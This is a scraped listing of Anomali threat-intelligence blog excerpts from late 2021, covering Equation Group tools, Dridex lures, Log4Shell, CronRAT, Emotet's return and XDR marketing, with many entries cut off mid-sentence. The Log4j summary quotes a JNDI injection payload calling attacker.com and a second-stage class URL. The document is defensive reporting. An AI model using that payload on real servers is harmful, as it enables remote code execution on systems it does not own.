Check Point researchers have published their findings on the Equation Group’s post-exploitation framework DanderSpritz — a major part of the “Lost in Translation” leak — with a focus on its DoubleFeature logging tool. DoubleFeature (similar to other Equation Group tools) employs several techniques to make forensic analysis difficult: function names are not passed explicitly, but instead a checksum of it; strings used in DoubleFeature are decrypted on-demand per function and they are re-encrypted once function execution completes. DoubleFeature also supports additional obfuscation methods, such as a simple substitution cipher and a stream cipher. In its information gathering DoubleFeature can monitor multiple additional plugins including: KillSuit (also known as KiSu and GrayFish) plugin that is running other plugins, providing a framework for persistence and evasion, MistyVeal (MV) implant verifying that the targeted system is indeed an authentic victim, StraitBizarre (SBZ) cross-platform implant, and UnitedRake remote access tool (UR, EquationDrug).
Analyst Comment: It is important to study Equation Group’s frameworks because some of the leaked exploits were seen exploited by other threat actors. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place.
MITRE ATT&CK: [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140
Tags: Equation Group, DanderSpritz, DoubleFeature, Shadow Brokers, EquationDrug, UnitedRake, DiveBar, KillSuit, GrayFish, StraitBizarre, MistyVeal, PeddleCheap, DiceDealer, FlewAvenue, DuneMessiah, CritterFrenzy, Elby loader, BroughtHotShot, USA, Russia, APT
Dridex Affiliate Dresses Up as Scrooge
(published: December 23, 2021)
Days before Christmas, an unidentified Dridex affiliate is using malspam emails with extremely emotion-provoking lures. One malicious email purports that 80% of the company’s employees have tested positive for Omicron, a variant of COVID-19, another email claims that the recipient was just terminated from his or her job. The attached malicious Microsoft Excel documents have two anti-sandbox features: they are password protected, and the macro doesn’t run until a user interacts with a pop-up dialog. If the user makes the macro run, it will drop an .rtf f |
Ransomware Malware Tool Vulnerability Threat Conference | APT 35 | |
|
2021-12-21 16:57:00 | Anomali Cyber Watch: \'PseudoManuscrypt\' Mass Spyware Campaign Targets 35K Systems, APT31 Intrusion Set Campaign: Description, Countermeasures and Code, State-sponsored hackers abuse Slack API to steal (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT31, Magecart, Hancitor, Pakdoor, Lazarus, and Vulnerabilities CVE-2021-21551.. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
NSW Government Casual Recruiter Suffers Ransomware Hit
(published: December 17, 2021)
Finite Recruitment suffered a ransomware attack during the month of October 2021, resulting in the exfiltration of some data. Their incident responders (IR) identified the ransomware as Conti, a fast encrypting ransomware commonly attributed to the cybercriminal group Wizard Spider. The exfiltrated data was published on the dark web, however the firm remains fully operational, and affected customers are being informed.
Analyst Comment: Always check to see if there is a decryptor available for the ransomware before considering payment. Enforce a strong backup policy to ensure that data is recoverable in the event of encryption or loss.
MITRE ATT&CK: [MITRE ATT&CK] Scheduled Transfer - T1029
Tags: Conti, Wizard Spider, Ransomware, Banking and Finance
Phorpiex botnet is back with a new Twizt: Hijacking Hundreds of crypto transactions
(published: December 16, 2021)
Check Point Research has uncovered a new variant of the Phorpiex botnet named Twizt. Historically, Phorpiex utilized sextortion, ransomware delivery, and cryptocurrency clipping. Twizt however, appears to be primarily focused on stealing cryptocurrency and have stolen half a million dollars since November 2020 in the form of Bitcoin, Ether and ERC20 tokens.The botnet features departure from it’s traditional command and control (C2) infrastructure, opting for peer-to-peer (P2P) communications between infected hosts, eliminating the need for C2 communication as each host can fulfill that role.
Analyst Comment: Bots within a P2P network need to communicate regularly with other bots to receive and share commands. If the infected bots are on a private network, private IP addresses will be used. Therefore, careful monitoring of network traffic will reveal suspicious activity, and a spike in network resource usage as opposed to the detection of C2 IP addresses.
MITRE ATT&CK: [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Clipboard Data - T1115
Tags: Phorpiex, Twizt, Russia, Banking and Finance, Cryptocurrency, Bitcoin
‘PseudoManuscrypt’ Mass Spyware Campaign Targets 35K Systems
(published: December 16, 2021)
Kaspersky researchers have documented a spyware that has targeted 195 countries as of December 2021. The spyware, named PseudoManuscrypt, was developed and deployed by Lazarus Group |
Ransomware Malware Vulnerability Threat Guideline Medical | APT 41 APT 38 APT 28 APT 31 | |
|
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
|
2021-12-13 22:26:00 | Apache Log4j 2 Vulnerability Affects Numerous Companies, Millions of Users (lien direct) | A critical vulnerability, registered as CVE-2021-44228 (Log4Shell), has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in.[1] The vulnerability was discovered by Chen Zhaojun of Alibaba in late November 2021, reported to Apache, and subsequently released to the public on December 10, 2021.[2]
The Apache Software Foundation (ASF) rates CVE-2021-44228 as a 10 on the common vulnerability scoring system (CVSS) scale.[3] Log4Shell is a remote code execution (RCE) vulnerability that is exploited via improper deserialization of user input that is sent into the Log4j package framework.[4] Specifically, the vulnerability is located in the JNDI component of the LDAP connector.[5] A threat actor’s objective is to trick JNDI into connecting to an threat actor-controlled directory.[6] However, the exploitation reliability of Log4Shell is dependent on how the package is implemented.
Affected versions: log4j version 2.0-beta9 to version 2.14.1.
Attack Complexity: Low.
Privileges Required: None.
User Interaction: Not required.
How Anomali Can Help
ThreatStream: The Anomali Threat Research team has released a ThreatStream dashboard “Log4Shell (CVE-2021-44228)” for tracking associated indicators, research articles, and vulnerable products. (shown in figure below.)
Integrator: Customers can use Anomali Integrator to block specific IOCs in their downstream security integrations.
Match: Match can provide alerting and retrospective lookup capabilities to detect and contextualize matches for these indicators.
For more information, reach out to your Customer Success Manager.
Endnotes
[1] “CVE-2021-44228 Detail,” NVD NIST, access December 13, 2021, published December 10, 2021https://nvd.nist.gov/vuln/detail/CVE-2021-44228; Free Wortley, et al., “Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package,” LunaSec, accessed December 13, 2021, published December 12, 2021, https://www.lunasec.io/docs/blog/log4j-zero-day/.
[2] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV, accessed December 13, published December 10, 2021, https://www.elastic.co/blog/detecting-log4j2-with-elastic-security.
[3] “CVE-2021-44228 Detail,” NVD NIST.
[4] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV.
[5] “Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild,” Cisco Talos Blog, accessed December 13, 2021, published December 10, 2021, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html.
[6] Hans-Martin Münch, “VULNERABILITY NOTES: LOG4SHELL,” Mogwai Labs, accessed December 13, 2021, published, December 10, 2021, https://mogwailabs.de/en/blog/2021/12/vulnerability-notes-log4shell/?s=09. |
Vulnerability Threat | ||
|
2021-12-09 21:18:00 | Is XDR Right for Your Enterprise? To Answer the Question, You Need to Know What XDR Is (lien direct) | Anomali’s Mark Alba Joins ‘Down the Security Rabbithole’ Host Rafal Los to Decipher the Hype and Discuss How Detection Innovations Like Threat Intel and MITRE ATT&CK Are Critical to Success If you are in the cybersecurity industry, you’ve heard plenty about Extended Detection and Response (XDR). Some recognize XDR as an important advancement that will strengthen security postures, others are confused by it. One thing is now certain, it’s not just another buzzword. XDR is a very real sea change in the market, one that no one can afford to overlook. Recently, our Chief Product Officer Mark Alba joined ‘Down the Security Rabbit Hole’ podcast host Rafal Los to help security and risk professionals understand what this latest movement is all about and what its practical cybersecurity benefits are. The conversation spans a high-level overview of how it has come to be and drills down into why integrations with supporting technologies like threat intelligence and the MITRE ATT&CK Framework are key to a successful XDR deployment. To learn more about the growing trend and whether it can address your cybersecurity use cases and challenges, listen to the podcast: Beyond Buzzwords: XDR | Threat | ||
|
2021-12-07 16:04:00 | Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
New Malware Hides as Legit Nginx Process on E-Commerce Servers
(published: December 2, 2021)
Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129
Tags: NginRAT, CronRAT, Nginx, North America, EU
How Phishing Kits Are Enabling A New Legion Of Pro Phishers
(published: December 2, 2021)
Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested.
Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.
Tags: Phishing, XBATLI
Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
(pub |
Ransomware Malware Tool Vulnerability Threat Cloud | APT 37 | ★★★★ |
|
2021-11-30 17:09:00 | Anomali Cyber Watch: Web Skimmers Victimize Holiday Shoppers, Tardigrade Targets Vaccine Manufacturers, Babadeda Crypter Targets Crypto Community, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data breach, Stealthy malware, Vulnerabilities and Web skimmers. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Micropatching Unpatched Local Privilege Escalation in Mobile Device Management Service (CVE-2021-24084 / 0day)
(published: November 26, 2021)
0patch Team released free, unofficial patches to protect Windows 10 users from a local privilege escalation (LPE) zero-day vulnerability in the Mobile Device Management Service. The security flaw resides under the "Access work or school" settings, and it bypasses a patch released by Microsoft in February to address an information disclosure vulnerability tracked as CVE-2021-24084. Security researcher Abdelhamid Naceri discovered this month that the incompletely-patched flaw could also be exploited to gain admin privileges after publicly disclosing the newly-spotted bug in June. He also published a proof of concept (POC) for a related vulnerability in Windows 11.
Analyst Comment: Check if your Windows 10 version is affected and if so, apply the appropriate free micropatches. Plan to patch your Windows 11 systems when security patches become available. As actors now have a POC for the Windows 11 privilege escalation vulnerability, it is important to harden your systems to avoid the initial access.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068
Tags: CVE-2021-24084, Vulnerability, Micropatching, Privilege escalation, LPE, Administrative access, Zero-day, Windows, Windows 10, Windows 11
CronRAT Malware Hides Behind February 31st
(published: November 24, 2021)
Sansec researchers have discovered CronRAT, a new remote access trojan (RAT), that is capable of stealing payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. By modifying the server-side code it bypasses browser-based security solutions. CronRAT actors engage in Magecart attacks achieving additional stealthiness thanks to the Linux Cron Job system. CronRAT code is compressed, Base64-encoded and hidden in the task names in the calendar subsystem of Linux servers (“cron”). To avoid system administrators’ attention and execution errors, those tasks are scheduled on a nonexistent day (such as February 31st). Other CronRAT stealthiness techniques are: anti-tampering checksums, being controlled via binary/obfuscated protocol, control server disguised as Dropbear SSH service, fileless execution, launching tandem RAT in a separate Linux subsystem, and timing modulation.
Analyst Comment: Websites, much like personal workstations, require constant maintenance and upkeep in order to adapt to the latest threats. All external facing assets should be monitored and scanned for vulnerabilities. Threats like CronRAT make it critical that server software is kept up to date. The ability to easily restore from backup, incident response planning, and customer communication channels should all be established before a breach occurs. In addition, supply chain attacks are becoming more frequent amongst threat actors as their Tactics, Techniques, and Procedures (TTPs) evolve. Therefore, it is par |
Ransomware Malware Tool Vulnerability Threat | ||
|
2021-11-30 12:00:00 | Anomali November Quarterly Product Release (lien direct) |
As the holiday season approaches, our team has been working hard to bring holiday joy with enhancements and features to Anomali’s suite of intelligence-driven XDR solutions.
We’re excited to announce our quarterly product release update for November 2021.
Key highlights for this quarter include:
Anomali Match Cloud Deployment Availability
New Anomali Targeted Threat Monitoring Feed
Enhancements to Intelligence Initiatives
Unified App Store Management
STIXX TAXII 2.1 Service Support
Match Cloud Beta
According to Gartner research, a whopping 85% of enterprises will adopt a cloud-first principle by 2025. That’s not surprising, as the pandemic increased digital transformation plans, leading enterprise organizations to shift their priorities and focus.
Anomali has been at the forefront of cloud security, beginning with ThreatStream, our threat intelligence management solution. We’re excited to continue innovating in cloud security by introducing a cloud-native deployment option for Match, Anomali's extended detection and response (XDR) engine.
Anomali Match helps organizations quickly detect and respond to threats in real-time to stop breaches and attackers. Match provides precision attack detection that enables security teams to pinpoint relevant threats, understand their criticality, and prioritize response. By offering Match via cloud-native deployment, customers receive all the advantages XDR delivers along with reducing total cost of ownership (TCO), as Anomali updates and manages the expanding IOC repository, enhancements, integrations, new versions, and overall platform performance.
Match and ThreatStream are key components of Anomali’s Cloud XDR platform. Look for more information on the launch of Anomali’s XDR platform coming soon.
Anomali Targeted Threat Monitoring
Organizations face constant threats from sophisticated threat actors using phishing and other forms of social engineering to target their employees and customers. According to the FBI, 6.95 million new phishing and scam pages were created in 2020. Security teams need help keeping up with the ever-changing threat landscape to help defend their brand against these targeted attacks.
Anomali Targeted Threat Monitoring is a new intelligence feed focused on targeted domain attacks, providing analysts with the automated threat intelligence they need to respond quickly and effectively. Identified domains and compromised credentials are imported into ThreatStream and operationalized, providing security teams with visibility and enriched intelligence to fully protect their assets, as well as increased efficiencies by operationalizing this targeted intelligence within ThreatStream.
Visit the Anomali App Store or reach out to your Customer Success Manager for more information.
Enhancements to Intelligence Initiatives
In the August quarterly release, w |
Threat Guideline | ||
|
2021-11-23 20:30:00 | Anomali Cyber Watch: APT, Emotet, Iran, RedCurl and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Data leak, Malspam, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Emotet malware is back and rebuilding its botnet via TrickBot
(published: November 15, 2021)
After Europol enforcement executed a takeover of the Emotet infrastructure in April 2021 and German law enforcement used this infrastructure to load a module triggering an uninstall of existing Emotet installs, new Emotet installs have been detected via initial infections with TrickBot. These campaigns and infrastructure appear to be rapidly proliferating. Once infected with Emotet, in addition to leveraging the infected device to send malspam, additional malware can be downloaded and installed on the victim device for various purposes, including ransomware. Researchers currently have not seen any spamming activity or any known malicious documents dropping Emotet malware besides from TrickBot. It is possible that Emotet is using Trickbot to rebuild its infrastructure and steal email chains it will use in future spam attacks.
Analyst Comment: Phishing continues to be a preferred method for initial infection by many actors and malware families. End users should be cautious with email attachments and links, and organizations should have robust endpoint protections that are regularly updated.
***For Anomali ThreatStream Customers***
To assist in helping the community, especially with the online shopping season upon us, Anomali Threat Research has made available two, threat actor-focused dashboards: Mummy Spider and Wizard Spider, for Anomali ThreatStream customers. The Dashboards are preconfigured to provide immediate access and visibility into all known Mummy Spider and Wizard Spider indicators of compromise (IOCs) made available through commercial and open-source threat feeds that users manage on ThreatStream.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Data Encrypted - T1022 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Automated Collection - T1119
Tags: Emotet, Trickbot, phishing, ransomware
Wind Turbine Giant Offline After Cyber Incident
(published: November 22, 2021)
The internal IT systems for Vestas Wind Systems, the world's largest manufacturer of wind turbines, have been hit by an attack. This attack does not appear to have affected their manufacturing or supply chain, and recovery of affected systems is underway, although a number of systems remain off as a precaution. The company has announced that some data has been compromised. The investigation of this incident is ongoing, but may have been a ransomware attack. The incidents of ransomware across the globe increased by near |
Ransomware Spam Malware Tool Vulnerability Threat Patching | ||
|
2021-11-23 19:55:00 | Mummy Spider\'s Emotet Malware is Back After a Year Hiatus; Wizard Spider\'s TrickBot Observed in Its Return (lien direct) | Mummy Spider (TA542, Emotet) recently resumed their malicious activity with the notorious information-stealing malware, Emotet, after a year-long hiatus.[1] As part of this return, the Emotet malware has been observed delivered via the TrickBot malware, which is organized by the Wizard Spider (TrickBot, UNC1878) group.[2]
Emotet and Trickbot are dangerous families that have undergone numerous changes and upgrades over years, with Emotet being first discovered in 2014 and TrickBot in 2016.[3] The longevity of these malware families, even with international law enforcement taking down Emotet infrastructure as of January 2021, showcases the relentless nature of the threat actors behind them.
To assist in helping the community, especially with the online shopping season upon us, Anomali Threat Research has made available two threat actor focused dashboards: Mummy Spider and Wizard Spider, for Anomali ThreatStream customers. The Dashboards are preconfigured to provide immediate access and visibility into all known Mummy Spider and Wizard Spider indicators of compromise (IOCs) made available through commercial and open-source threat feeds that users manage on ThreatStream.
Customers using ThreatStream, Anomali Match, and Anomali Lens are able to immediately detect any IOCs present in their environments and quickly consume threat bulletins containing machine-readable IOCs. This enables analysts to quickly operationalize threat intelligence across their security infrastructures, as well as communicate to all stakeholders if/how they have been impacted.
Anomali recently added thematic dashboards that respond to significant global events as part of ongoing product enhancements that further automate and speed essential tasks performed by threat intelligence and security operations analysts. In addition to Mummy Spider and Wizard Spider, ThreatStream customers currently have access to multiple dashboards announced as part of our November quarterly product release.
Customers can integrate the Mummy Spider and Wizard Spider dashboard, among others, in the “+ Add Dashboard” tab in the ThreatStream console:
.png)
.png)
Endnotes
[1] “#Emotet has almost doubled its botnet C2 infrastructure in the past 24 hours from 8 active C2s yesterday to 14 active C2s today…,” abuse.ch, accessed November 22, 2021, published November 16, 2021, https://twitter.com/abuse_ch/status/1460649241454563341; “Another Update on #Emotet E4 distro - We are now seeing URL based lures for the document downloads…,” Cryptolaemus, accessed November 22, 2021, published November 17, 2021, https://twitter.com/Cryptolaemus1/status/1460870766518484993.
[2] Luca Ebach, “Guess who’s back,” cyber.wtf, accessed November 22, 2021, published November 15, 2021, https://cyber.wtf/2021/11/15/guess-whos-back/; “Emotet is back. Here’s what we know.,” Intel471 Blog, accessed November 22, published November 16, 2021, https://intel471.com/blog/emotet-is-back-2021.
[3] Alina Georgiana Petcu, “Emotet Malware Over the Years: The History of an Infamous Cyber-Threat,” Heimdal Security Blog, accessed November 22, 2021, published April 29, 2021, https://heimdalsecurity.com/blog/emotet-malware-history/; Hugh Aver, “New tricks of the Trickbot Trojan, Kaspersky Blog, accessed November 22, 2021, published October 19, 2021, https://www.kaspersky.com/blog/trickbot-new-tricks/42622/#:~:text=Exactly%20five%20years%20ago%2C%20in,credentials%20for%20online%20banking%20services. |
Malware Threat | ||
|
2021-11-18 14:21:00 | Improving Security Operations with Intelligence-driven XDR (lien direct) | Enterprises are increasingly adopting more complex security architectures that include multiple layers of protection to empower their security team and keep up with ever-increasing advanced threats. While this approach can help protect against sophisticated attacks, it also makes it difficult to correlate events across different components of the architecture. As such, enterprises need to simplify their security architecture so they can gain better visibility into what’s going on at each level within their environment. According to a survey conducted by Enterprise Strategy Group, The Impact of XDR on the Modern SOC, most respondents believe that XDR solutions offer significant benefits for organizations when implemented correctly. What did the ESG research find? Security Operations Center's are struggling with: Rapidly expanding attack surface: This comes as no surprise as digital transformation was not only accelerated because of the pandemic, it has grown exponentially with the growing work from home workforce. Growing complexity in the threat landscape: Threat actors continue to evolve and cyber attacks continue to increase in complexity, making it harder to keep up with an ever-changing threat landscape to identify complex attacks. Silos of security data: Security teams continue to work in silos, implementing tools, processes, and initiatives without effectively working cross-functionally. Overwhelming amounts of alerts: Analysts are suffering from alert fatigue, chasing false positives from security controls not fine-tuned for their environment, affecting their detection and response capabilities. Intelligence-driven XDR helps organizations: Gain greater insight into your organization’s security stack and infrastructure Identify potential threats with increased threat visibility Improve operational efficiency and security efficacy Reduce the number of false positives and negatives Simplify your security program and operations Anomali provides a threat intelligence-driven extended detection and response solution that correlates all installed security telemetry with threat intelligence to enable security analysts to pinpoint relevant threats, understand their criticality, and prioritize response. The result? Improved efficiencies and stronger defenses. Download the ESG research to find out how XDR is changing the way organizations define and manage risk, as well as how XDR is impacting the role of the SOC in an organization. Or contact us to see how an intelligence-driven XDR solution can help your organization. | Threat | ||
|
2021-11-16 17:34:00 | Anomali Cyber Watch: REvil Affiliates Arrested, Electronics Retail Giant Hit By Ransomware, Robinhood Breach, Zero Day In Palo Alto Security Appliance and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Data leak, Malspam, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer
(published: November 8, 2021)
US Cybersecurity and Infrastructure Security Agency (CISA) has released an alert about advanced persistent threat (APT) actors exploiting vulnerability in self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus. PaloAlto, Microsoft & Lumen Technologies did a joint effort to track, analyse and mitigate this threat. The attack deployed a webshell and created a registry key for persistence. The actor leveraged leased infrastructure in the US to scan hundreds of organizations and compromised at least nine global organizations across technology, defense, healthcare and education industries.
Analyst Comment: This actor has used some unique techniques in these attacks including: a blockchain based legitimate remote control application, and credential stealing tool which hooks specific functions from the LSASS process. It’s important to make sure your EDR solution is configured to and supports detecting such advanced techniques in order to detect such attacks.
MITRE ATT&CK: [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Application Layer Protocol - T1071 | [MITRE ATT&CK] Credentials in Files - T1081 | [MITRE ATT&CK] Brute Force - T1110 | [MITRE ATT&CK] Data Staged - T1074 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hooking - T1179 | [MITRE ATT&CK] Registry Run Keys / Startup Folder - T1060 | [MITRE ATT&CK] Pass the Hash - T1075
Tags: Threat Group 3390, APT27, TG-3390, Emissary Panda, WildFire, NGLite backdoor, Cobalt Strike, Godzilla, PwDump, beacon, ChinaChopper, CVE-2021-40539, Healthcare, Military, North America, China
REvil Affiliates Arrested; DOJ Seizes $6.1M in Ransom
(published: November 9, 2021)
A 22 year old Ukranian national named Yaroslav Vasinskyi, has been charged with conducting ransomware attacks by the U.S Department of Justice (DOJ). These attacks include t |
Ransomware Data Breach Malware Tool Vulnerability Threat Medical | APT 38 APT 27 APT 1 | |
|
2021-11-11 16:14:00 | Is your organization\'s security brain functioning at maximum capacity? Will the hype of XDR be the key that unlocks its full potential? (lien direct) | You have heard the popular myth that human beings only use a small percentage of their brain capacity. As a sci-fi enthusiast, I love this one. Dreaming up fantastic scenarios where regular folk using 10 percent of their brainpower tap into the other 90 percent. They use wonder pills or alien injections to become savants, gain telekinetic powers, read people's minds, or otherwise master the paranormal realm. The mundane reality is a lot more exciting than the myth. It turns out that we use virtually every part of the brain, and that most of the brain is active almost all the time. It's powering everything from basic motor functions like breathing or coordinating movement to higher-order functions like rational thought processing, logical sequencing, and making analytical considerations. The brain is constantly working to make decisions, both voluntarily and involuntarily. A lot of those decisions are informed by memory, be it memory of past events or random information, or so-called muscle memory formed by practicing repetitive movement in certain situations to achieve an objective. Ultimately, the brain is using most of its power transferring memory directly into action. It connects a lifetime of relevant past experiences as the foundation for how it prods the body to react to stimuli or how it spurs rational decision-making. There's a big parallel here between the human brain and the cyber security operations “brain.” The security team's body — made up of security operations, security monitoring, and incident response personnel — needs a fully functioning 'brain' to process information about its existing threat circumstances and to then come up with beneficial action. This description of a "metaphorical" brain is the combined aggregate of human thinking power and machine-powered thinking over security technologies in place. A lot of these teams have hoped for that fantastical pill that gives them the supernatural powers of completely automated threat detection and response. Many less than scrupulous security vendors been more than happy to offer up solutions that look almost like that on the surface, but never quite live up to those promises. That's because it's just as much science fiction as the human brain myth. The mundane reality is that the security brain needs good memories, i.e., threat intelligence, and the best systems for making connections between them and the input about the current situation the security organization faces to help it process a situation and turn it into appropriate action. This is exactly what an effective Extended Detection and Response (XDR) architecture achieves. It brings together all memories, connecting the security data and telemetry collected by the security technologies deployed. It reaches back into the past to identify whether or not the organization has potentially been a victim of a threat and then crunches that information to guide decisions about how the security team should respond — both automatically and manually. Traditionally the security world has faced three major challenges in helping teams fully maximize the function of its security brain. Challenge 1: The first is that many organizations don't have visibility into all the threats on both a global scale and within local context. In other words, the local threats existing within or most relevant to their environment. Challenge 2: The second is that detecting threats requires having the right signals or information to show whether a threat does or doesn’t exist. Many security teams have solutions that provide them with shoddy 'memories,' providing bad data or false signals that keep triggering alarms for threats that aren't present. Challenge 3: And then the third challenge is a lack of connective brainpower between all of the disparate intel about individual situational inputs. Smaller security events are often deeply interconnected, | Threat | ||
|
2021-11-10 16:00:00 | Anomali Cyber Watch: GitLab Vulnerability Exploited In The Wild, Mekotio Banking Trojan Returns, Microsoft Exchange Vulnerabilities Exploited Again and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Babuk, Braktooth, Linux, Gamaredon, Magecart and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
BrakTooth Bluetooth Bugs Bite: Exploit Code, PoC Released
(published: November 5, 2021)
